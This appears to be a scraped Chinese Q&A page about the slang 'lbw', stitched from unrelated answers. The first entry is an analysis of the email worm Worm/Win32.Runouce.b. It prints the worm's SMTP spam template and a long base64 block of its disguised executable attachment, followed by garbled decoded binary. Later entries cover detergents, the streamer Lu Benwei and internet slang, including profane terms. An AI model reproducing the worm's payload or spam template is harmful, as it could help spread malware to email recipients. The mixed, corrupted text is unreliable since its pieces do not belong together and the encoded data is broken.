① Worm/Win32.Runouce.b[Email]的網路行為
協議:TCP
埠:139 445
描述:通過以上埠發送惡意郵件,郵件內容:
HELO btamail.net.cn
MAIL FROM: [email protected]
RCPT TO:
DATA
TO:
SUBJECT: A-738DF22C9CA04 is comming!
MIME-Version: 1.0
--#BOUNDARY#
Content-Type: text/html
--#BOUNDARY#
MIME-Version: 1.0
Content-Type: audio/x-wav; name=pp.exe
Content-id: THE-CID
TVpQAAIAAAAEAA8A//AA4ftAnNIbg
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A4ACOgQsBAhkAAgAAAAYAAAAAAAAA
AAAAAAEAAAIAAAAAAQAAAQAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAQ09ERQAAAAAAEAAAABAAA
AAAAAAAAAAEAAAMAuaWRhdGEAAAAQ
AAAAAAAAAAAAAAAAAAQAAA8AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//ge4AEAAAZoE+TVp18w+3fjwD/otveAPui10g
A94zwIvWg8MEQIs7A///Im
0JOAAAADoXgQAAIvpVv/T//Qi/DoywYAAIvpVv/T/KuLzeL1iwQk6A0AAABBRFZBUE
kzMi5ETEwA/9CL8OgdBwAAi+lW//9CL8OhcBwAAi+lW/9P8q4vN4vWLBCToDAAAAFdTT
0NLMzIuRExMAP/Qi/DofAcAAIvpVv/T/KuLzeL1i//1YE/1YIC8B0Aszp/1YMagFQ
/1YQ6GgBAACL9OgNAAAAi/+gkAAI1CO5C
uhFCAAAi4boAAAAaGDqAABQ/1Zkg/
j/5lc2VIYWNrZXItMiBNb25pdG9yA
FhqAFD//
vBUAAFBUagBQUGoAagD/VnSL2FiLhugAAABoYOoAAFD/VmRQagBT/1Z4WIP4/
TAACB7AABAABU6OwGAACL/GoQV/9WcIP4/3Qdi9johRMAAGoAagBT/1Y8U+hjCwAAi/xqB1f/VihQVOguAAAAU09GVFdBUkVcTW
/
VP/lqQAAADoAAAAAF+/1Z0WDPAiYbo
B0b2oBagD/0IuW4AAAAA+3WjwD2ou
VLoUBUAAP9WTFBUagBQVWoAagD/Vl
yJhugAAABYaPQBAAD/VkTM6WoAagD/lowAAABQVFD/logAAABqAGj/Dx8A//1ZoC8B0S
4vojZdyFQAAUFRqTpCQkJBSVVP/VlRYg//VlT/VkxUagBQVWoAagBT/1ZYiYboAAAA
WFP/1lQQDoFAAAAFdpZGVDaGFyVG9
ABfbGNyZWF0AOgUAAAAR2V0U3lzdG
amVjdADoDAAAAENsb3NlSGFuZGxlA
AV3JpdGVQcm9jZXNzTWVtb3J5AOgM
JTZXJ2aWNlUHJvY2VzcwDoBgAAAFN
WFkAOgHAAAAX2xvcGVuAOgMAAAAU2
AABGaW5kTmV4dEZpbGVBAOgPAAAAR
lVHlwZUEA6AgAAABXaW5FeGVjAOgQ
hBAOgNAAAATG9hZExpYnJhcnlBACv
MwekC/+6AwAAABNZXNzYWdlQm94QQ
/+DpWIvM6BgAAABSZWdOb3RpZnlDa
4QQDoDAAAAFJlZ09wZW5LZXlBACvM
wekC/+TmV0T3BlbkVudW1BACvMwek
C/+ZWN0AOgOAAAAZ2V0aG9zdGJ5bm
dHVwACvMwekC/+DpWIvM6AwAAADHu
bHQwO666da+IQDoEAAAAMily//
AAAAz/6AwAAADJ57vh1vfS5brDIQA
rzP/g6cgAAABgi30IaAABAABX/1ZsA//1YUg/
gCcguD+AV0BlToqAAAAFpCWeLlw+kz/++lXagHoIAAAAMPpV2oC6BYAAADD6
VdqAugMAAAAw+//+WtAAA
AFlZC8B1CIv8/1UQ697pU/+/3UI/1YYC8B0Zf9
/VhyL2IP4/3QxVFP/////693pVOhAAA
AA69TpU/9WJMcEJC4uAABU//3UI/xLM6cgAAABg6AYAA
+noBAAAANZQQABaw+
//4v8agBX/1Ywg/j/dECL2LgAAQAAUIvEUFf/loAAAABYA8fHAC5lbWzHQAQ
AAAAAagBX/1Zwg/j/dA+L+FdTagDolQQAAFf/VkBT/+hg////PS53YWJ0IT0uYWRjdC
+gVAwAAgewAAQAAVP+
gJT/1Ywg/j/dBCL2Gg0EgAAVFP/VjhT/1ZAycIEAOnIAAAAi30IjV8sU+jZ/v//
BMnCBABqAFP/VihqAlP/VjCD+P90HIvYU+hcAAAAjUcEjU8MjVcUUlFQU/9WLFP/VkCNXyz/N1P/VijJwgQAagBT/1YoagJT/1Y
wg/j//VixT/1ZAjV8s/zdT///4vEagBQ/1Ywgc
QAAQAAg/j//w+EnwAAAIv4V1NqAOgBAwAAV/9WQIt9CGoCagBX/1Y86
uKCJyZWFkbWUuZW1sIiwgbnVsbCwi
+PC9odG1sPgBYanhQV/9WOFP/VkBhycIEAOnIAAAAYIH
sABAAAIv8aAAQAABX/3UI/1Y0D7dHPAP4O/0Ph9QAAABmgT9QRQ+FyQAAAI2f+AAAAA+3TwZJg8Mo4vs73Q+HsQAAAItHKCtDDH
IjA0MUagBQ/3UI/1Y8UIvEagRQ/3UI//3RwUAX8GQAAK0MUiUMQi1MIO
+D7xFo/BkAAFf/dQj/VjiD+P90GGoA
agD/dQj/+v//i/xqAFf/VjCD+P90D4vYU/91COjXAQA
AU//w+EggAAAIvYgewAAQAAi/wz0lJQi8RqAVBT/1Y0WVoLwHRbi8SDwCA7+H
figPlAdEWA+S50PID5MHIPgPk5cjiA+UFyBYD5fnIuM8D8qoD+AXW7gPoBcrYr/IP/BnKvigQkPEB0qDwudKRU6Ej////rnP7C6
wL+xorB/KrrlFP/VkCBxAABAABhycIEAMgAAABgagD/dQj/VjCD+P90cIvYgewAAQAAi/xoAAEAAFdT/1Y0PQABAAB1S4tHYGoA
UFP/VjyLT2SB+QAQAAB3NlFqRFdT///4HEAAEAAFniyoHEAAE
AAFP/VkBhycIEAMgEAABgiWX8gewAEAAAi/z/dQhX6AoCAABQV/
AwAABX/3UM/1Y0g/j//91EP9WOMcEJ
A0KDQpqBFf/dRD//xUaAEBAAD/lrwAAAALwA+FSQEAAGoAagFq
Av+W1AAAAIP4/w+ELgEAAIvYZscHAgBqGf++WzAAAAAvAD4TyAAAAi0AQiwC
JRwRqEFdT/5bQAAAAg/j/D4TXAAAA/3UIV+jmAAAAagBQV1P/
kEJIv8aAAwAABX/3UM/1Y0g/j/v8a
gBQV1P//5bEAAAAaKAPAAD/VkToBgAAAFFVSVQNClhqAGoGUFP/lsQAAABo
oA8AAP9WRMdF+AEAAABT/5bYAAAA/5bAAAAAi2X8YYtF+MnCCADIBAAAYLgAAQAAK+CL1FBUUv+WgAAAAFjoHQIAAEhFTE8gYnR
FQgVE86ICVzDQpEQVRBDQpGUk9NOi
VmVyc2lvbjogMS4wDQpDb250ZW50L
PVU5EQVJZIw0KQ29udGVudC1UeXBl
FibGUNCg0KPGh0bWw+PEhFQUQ+PC9
UQgaGVpZ2h0PTNEMCB3aWR0aD0zRD
A+PC9pZnJhbWU+9udGVudC1UeXBlO
uZzogYmFzZTY0DQpDb250ZW50LWlk
OiBUSEUtQ0lEDQoNCgBYi/xX/3UMV/91DFD/dQj/lpwAAACL54lF/
zQ1Njc4OSsvAF6LfRCLVQzB4gMz2z
PAuQYAAADR4FP/dQjoMAAAAEp0DUPi74oEBvyq/0X8695J0+CKBAb8qv9F/
/NgAAZGeJJgAA6BwAAAD/Moki/+DpWOgPAAAAiyKP
AmRnjwYAAFlZ/+Dp6AQAAACI/hIAWsPpyAAAAOgIAAAA6NH/////
AAf//AAK4AAdAAAEaACIBAAK6EAABDh+
AQAHAwABCgAGUAADBAAGAgAFEAACI
AAyAAAwIAAwgADkAAAsAuaWRhdGEA
/wD/AP8Aa8P/JTAwQAD/AP8A/wD9KDAACjgwAAIwMAA
/wD/APkAAF+KB0cKwHQNUIvEagFQU/9WOFjr7A+2D0
fjEVFQi8RqAVBT/1Y4WFni8evVw+nIAAAAgewAAQAAM/aL/Ga4DQq5DAAAAPzzZqvo9vD//4sUtAPhigJC/KoKwHX36AkAAAC3o
svNz/vPogDoBAAAAMbz03dYagD/EAvAdFeL2OgEAAAAmMLRd1hqBVP/EAvAdEKL2OgEAAAAruLRd1+B7AAQAABUaAAQAABqDVP/
F4HEABAAAAvAdRtUaAAQAABqDFP//EOlR////6cgAAACLXQiB7AABAAC
L//EFjoBAAAALj/bnlYagBqAGoEagBT/xDoBAAAAEHobnlYaA
ABAABXagFqAFZT//EAvAdCyL2OgEAAAAALTmd1hq/1P/EOgAAAAAWYPBGpCQk
OgEAAAAKnXod1hqAVH/+maPAGaPQAaLdQiLfQyLTRDM
+2HJwgwA6cgAAABgi0UIagBQUGoA/=
經解密得到數據: HELO btamail.net.cn
MAIL FROM: [email protected]
RCPT TO:
DATA
FROM: [email protected]
TO:
SUBJECT: A-738DF22C9CA04 is comming!
MIME-Version: 1.0
Content-type: multipart/mixed; boundary=#BOUNDARY#
--#BOUNDARY#
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
--#BOUNDARY#
MIME-Version: 1.0
Content-Type: audio/x-wav; name=pp.exe
Content-Transfer-Encoding: base64
Content-id: THE-CID
MZP ?@ ????L?悙This program must be run under Win32 $7PEL ?飩巵 D @ ` 0N@ CODE `DATA @?idata 0 @?reloc?@? @?%00@(08000F0F0KERNEL32.dllSleep 0`桄 媡$ ?ah @瞄Y? 佹???f?MZu?穨< 䦆ox 顙] ?缷謨?@? ? GetProcAddress^3殺 ??趮驄]$ ??C媇 迡 ?迊禳孅壌$鑎 嬮V??嬐怩?$?USER32.DLL?嬸?嬮V??嬐怩?$?ADVAPI32.DLL?嬸?嬮V??嬐怩?$?MPR.DLL?嬸鑌嬮V??嬐怩?$?WSOCK32.DLL?嬸鑭嬮V??嬐怩嬼?ChineseHacker-2jj? ? 纓 涕? j P? 鑘 嬼?嬼h`?D靦閅鈒 ? 崅 ?? 岯-悙悏 鑒 楮 岯;悙悏 鑦 梏 崅?枸 岯-悙悏 ? 梟 岯;悙悏 鐴 媶h`P?d凐?V鐹^?Net Send * My god! Some one killed ChineseHacker-2 MonitorXjP? 霚Y梟 鑊 殍_媶墖?媶墖 媶墖& 婩D墖f 崌?PTjPPjj?t嬝X媶h`P?dPjS?xX凐? 涕V?^胭Y鐼 柁閅鐰 侅 T桁 孅j W?p凐? 嬝鑵 jjS?XjxPW?8S?@a陝 槿`侅 孅h W? ?4 稧< ??囋f?PE 吷崯 稯 I兠(懨;?嚤婫(+C r# C jP? ? --#BOUNDARY# MIME-Version: 1.0 Content-Type: audio/x-wav; name=pp.exe Content-Transfer-Encoding: base64 Content-id: THE-CID X孅W? W? P? ?湅鐗E鼇 a婨???`荅鐰+/^媫 婾 菱 3?攔 燕S? ?Jt C怙? ???轎余? ????M?=??廓a婨??QRV媢 婱 嬔陵 ? 鮁?誼? 耝ZY陝 XQ??閐g?dg?????閄???dg?YY??堽 Z瞄?柩??衢Y婨 増3郎?鑗 MZP ? @ ?
¬???L?悙This program must be run under Win32 $7圥E L ?飩 巵 @ P 0 N @ SCODE `DATA @ ?idata 0 @ ?reloc @ @ P???%00@??0 80 00 F0 F0 KERNEL32.dll Sleep? 0???G 纓 P嬆j PS?8X腱 ?G?QP嬆j PS?8XY怦胝瞄侅 3鰦黤? ??f?鯧???釆 B?纔麒 發送消息?企觲Xj?纓W嬝?樎褀Xj S?纓B嬝??褀_侅 Th j S?伳 纔 Th j S?F冩u 伳 陝 ?B$?Xh??镼??葖] 侅 孅?Runonce^h ?驄nyXTWjjVS?X??nyXjjj jS??A鑞yXh Wj jVS?胙槿?璱鑧X? jh?¬?纓,嬝?存wXj??Y兞 悙愯 *u鑧Xj Q?陝 槿`P L$⺋兝 ?婸 ?`?塒 ??銷ff廆 媢 媫 婱 帖a陝 槿`婨 jPPj?恆陝
解密之後發現該內容為PE可執行文件,病毒調用系統自帶的Outlook Express發送惡意郵件,病毒利用發送惡意郵件來傳播自身。
註:%System32%是一個可變路徑。病毒通過查詢操作系統來決定當前System文件夾的位置。
%Windir% WINDODWS所在目錄
%DriveLetter% 邏輯驅動器根目錄
%ProgramFiles% 系統程序默認安裝目錄
%HomeDrive% 當前啟動的系統的所在分區
%Documents and Settings% 當前用戶文檔根目錄
%Temp% Documents and Settings當前用戶Local SettingsTemp
%System32% 系統的 System32文件夾
Windows2000/NT中默認的安裝路徑是C:WinntSystem32
windows95/98/me中默認的安裝路徑是%WINDOWS%System
windowsXP中默認的安裝路徑是%system32%
② 洗滌液什麼意思網路上
洗滌劑[xǐ dí jì]
洗滌劑(Detergent) 是通過洗凈過程用於清洗而專門配製的產品。主要組分通常由表面活性劑、助洗劑和添加劑等組成。洗滌劑的種類很多,按照去除污垢的類型,可分為重垢型洗滌劑和輕垢型洗滌劑;按照產品的外形可分為粉狀、塊狀、膏狀、漿狀和液體等多種形態。[1]
中文名
洗滌劑
主要成分
表面活性劑
英文名
detergent
外觀形態
粉體、液體、固體
使用范疇
民用、工業
快速
導航
分類類型工業注意發展傳統類型
概述
整體分類
外觀形態分:粉體洗滌劑、液體洗滌劑、固體洗滌劑
使用范疇分:民用洗滌劑、工業洗滌劑
英文名
detergent
abstergent
detersive
分類
實踐證明:在織物的水洗中只有陰離子表面活性劑和非離子型表面活性劑,對織物去污能夠起到正面有效的作用。因此這兩種表面活性劑成為衣物洗滌劑的主要材料。洗滌劑要具備良好的潤濕性(LBW-1)、滲透性、乳化性、分散性(LBD-1分散劑)、增溶性及發泡與消泡等性能。這些性能的綜合就是洗滌劑的洗滌性能。洗滌劑的產品種類很多,基本上可分為肥皂、合成洗衣粉、液體洗滌劑、固體狀洗滌劑及膏狀洗滌劑幾大類。
洗滌劑
洗衣粉
洗衣粉 偏鹼性但性價比高
洗衣粉是一種鹼性的合成洗滌劑,去污力強、溶解性能好、使用方便,在抗硬水、泡沫豐富等方面都更勝一籌。同時價格較便宜,屬於性價比較高的洗衣清潔劑。長時間使用洗衣粉會使衣服發灰發黃,白色衣物最為明顯。
中國洗滌用品協會副秘書長張華濤介紹,洗衣粉更適合洗滌棉、麻、化纖及混紡織物,不適合洗滌毛、絲綢等衣物。由於毛、絲綢等衣物中含蛋白質,而洗衣粉是偏鹼性的,會損傷衣物。洗衣粉在溫水中的洗滌效果比冷水好,在溫水中溶解均勻,表面活性劑可發揮更大功效。水溫以30至60℃為宜。
③ 盧本偉牛B是什麼意思
盧本偉牛B沒有實際的意思,就是一個吐槽的網路詞彙。
【來源】:
盧本偉就是lol有名的主播wihte55開,盧本偉牛B出自55開經常開直播玩h1z1,只要殺到人了就說自己牛B。盧本偉牛B就在這樣的情況下誕生了,現在在很多直播間都可以看到盧本偉牛B的彈幕。
【網路詞彙】:
網路詞彙是在互聯網上使用的一些特殊語言或文字,是網民在網上聊天或發表意見時所創造並被廣泛認可的詞彙,它們是伴隨著互聯網誕生和發展而產生的;主要以簡潔,明了為主。指伴隨著互聯網誕生和發展而產生的詞彙,其中包括了:
1、信息領域的專業詞彙,如「登陸、寬頻、聊天室、防火牆」等等。
2、網民在網上聊天或發表意見時所創造並被廣泛認可的詞彙,如「斑竹、mm、9494」等等。
3、以網路作為媒介而開始風行的詞彙,如「雷、囧、打醬油、俯卧撐、賈君鵬、范跑跑、夏騙騙」等等。
④ 春秋網路主要是做什麼的
霸主,呂不韋。。好多好多。。主線任務。
⑤ 盧本偉是什麼意思啊
盧本偉本是一個非常出名的游戲主播,他之所以會被全網封禁,主要因為其不當的行為,帶來了比較惡劣的影響。
作為一個公眾人物,盧本偉沒有注意自己的身份,在自己受到質疑的時候,唆使粉絲去辱罵對方。在這些視頻,傳播到了網上之後,由此引發了強烈的不滿。我想也正是在這樣的情況下,才使得他最終被全網封禁。
所以綜合上面的情況看來,盧本偉之所以會被全網封禁,都是因為他自身發表了不當的言論,以及沒能起到良好的帶頭作用。
⑥ 蓋亞是什麼梗
這個「變身蓋亞」的梗,就是出自盧本偉,在盧本偉玩游戲的時候,心態崩了的時候,大喊出來的一聲哎呀!被網友惡搞成了變身蓋亞。
因為當時盧本偉在玩一個就是之前非常火的掄鐵錘的游戲,然而這個游戲真的是非常容易心態炸裂啊,畢竟好不容易上了很多,結果一不小心就掉下來了。
所以盧本偉當時再一次掉下去的時候,瞬間就怒吼一聲「哎呀(蓋亞)」!然而這個聲音和那個奧特曼蓋亞變身前的大喊完全一樣!所以網友將這個和奧特曼聯系在了一起。
(6)lbw網路用語是什麼意思擴展閱讀
人物爭議
2017年,五五開直播過程29殺吃雞引發開掛質疑,12月收到游戲圈廣泛關注。隨後盧本偉在線下舉辦了一場粉絲見面會,在直播過程中,盧本偉以及其粉絲用帶有侮辱性的話語攻擊質疑盧本偉開掛的up主和網友。
後來盧本偉因為未能正確引導粉絲行為而道歉,稱「沒有正確的引導大家」,並宣布停播一段時間,反省自己的所作所為,但整個道歉聲明中未提及是否「開掛」一事。
斗魚在回應該事時披露了對盧本偉事件的處理。一是,責令其在微博、直播間向公眾致歉;二是,斗魚將視其認錯改過態度,決定下一步處理措施;三是,斗魚會嚴格主播管理、規范主播言行,帶頭整頓直播風氣。
2017年12月8日,對於粉絲見面會辱罵事件,盧本偉在直播及微博上對網友道歉。
2018年1月17日 ,斗魚直播宣布對平台主播White55開解說(真名盧本偉)進行處罰,罰款100萬元並暫停其直播間。
⑦ 為什麼感覺網上的正常人越來越少了,說話怎麼都陰陽怪氣的,不但愛裝逼,還自帶邪氣
因為大多數時候 生活過的太艱難了 而網上說話 很多時候不用負太大責任, 就把生活中的壓力發泄在網路上了唄、這風氣也是很差勁了。就看看完了,別當真就好
⑧ 不懂就問,網路用語中的xp,u1s1,awsl,pxj,lxz,wdnmd,gkd都是什麼意思
其實你輸入法就能告訴你大部分
xp我不是很懂,這個指的是xp系統還是新品?
u1s1,有一說一,意思是單獨談起這件事的觀點,拋開其他所有影響的因素來講
awsl,啊我死了,從番劇中出來的梗,一般指某某特別可愛,諧音梗還有阿偉死了,愛玩矢量,同梗有阿偉亂墳崗等
pxj,就是批小將的意思,一般是貶義詞,是罵人的話,值得是b站腦殘日漫痴的意思,見不得其他人有和自己相反的觀點,比如自己喜歡某一個動漫角色,然後有評論說「我並不覺得這個角色好看」,就開始罵對方「不喜歡點進來看干什麼,NC吧」這樣之類的話,一般來說這類用戶的年級比較小,行為比較過激,自己喜歡的東西不能有其他人不好的
lxz這個我也不是很懂
wdnmd,我diao你媽的,白給,出自CSGO主播茄子在玩游戲時的口頭禪。也指「我帶你們打」
gkd,網路流行詞,該詞最早來源於貼吧,一些老哥發一些XX圖片,下面的人就會回復「求來源」、「快去請吱吱」「GKD」,意思是「搞快點」